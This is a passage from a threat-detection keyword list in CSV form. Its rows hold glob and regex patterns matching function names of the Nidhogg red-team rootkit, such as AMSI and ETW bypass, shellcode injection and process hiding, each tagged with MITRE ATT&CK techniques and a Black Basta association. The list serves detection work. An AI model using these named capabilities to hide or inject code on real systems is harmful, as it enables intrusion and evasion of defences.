T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53345" "*Nidhogg::FileUtils::NidhoggFileClearAllProtection*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggFileClearAllProtection.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53346" "*Nidhogg::FileUtils::NidhoggFileProtect*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggFileProtect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - 
T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53347" "*Nidhogg::FileUtils::NidhoggFileUnprotect*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggFileUnprotect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53348" 
"*Nidhogg::FileUtils::NidhoggQueryFiles*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggQueryFiles.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53349" "*Nidhogg::ModuleUtils::NidhoggAmsiBypass*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggAmsiBypass.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - 
TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53350" "*Nidhogg::ModuleUtils::NidhoggETWBypass*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggETWBypass.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53351" "*Nidhogg::ModuleUtils::NidhoggInjectDll*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggInjectDll.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 
- T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53352" "*Nidhogg::ModuleUtils::NidhoggInjectShellcode*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggInjectShellcode.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53353" "*Nidhogg::ModuleUtils::NidhoggPatchModule*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggPatchModule.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - 
T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53354" "*Nidhogg::ModuleUtils::NidhoggReadData*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggReadData.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53355" "*Nidhogg::ModuleUtils::NidhoggWriteData*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggWriteData.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - 
T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53356" "*Nidhogg::ProcessUtils::NidhoggProcessClearAllProtection*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessClearAllProtection.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53357" 
"*Nidhogg::ProcessUtils::NidhoggProcessElevate*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessElevate.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53358" "*Nidhogg::ProcessUtils::NidhoggProcessHide*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessHide.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - 
TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53359" "*Nidhogg::ProcessUtils::NidhoggProcessProtect*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessProtect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53360" "*Nidhogg::ProcessUtils::NidhoggProcessSetProtection*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessSetProtection.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - 
T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53361" "*Nidhogg::ProcessUtils::NidhoggProcessUnhide*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessUnhide.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53362" "*Nidhogg::ProcessUtils::NidhoggProcessUnprotect*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessUnprotect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - 
T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53363" "*Nidhogg::ProcessUtils::NidhoggQueryProcesses*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggQueryProcesses.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53364" "*Nidhogg::ProcessUtils::NidhoggQueryThreads*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggQueryThreads.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - 
T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53365" "*Nidhogg::ProcessUtils::NidhoggThreadHide*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggThreadHide.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53366" 
"*Nidhogg::ProcessUtils::NidhoggThreadProtect*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggThreadProtect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53367" "*Nidhogg::RegistryUtils::NidhoggRegistryClearAll*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryClearAll.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 
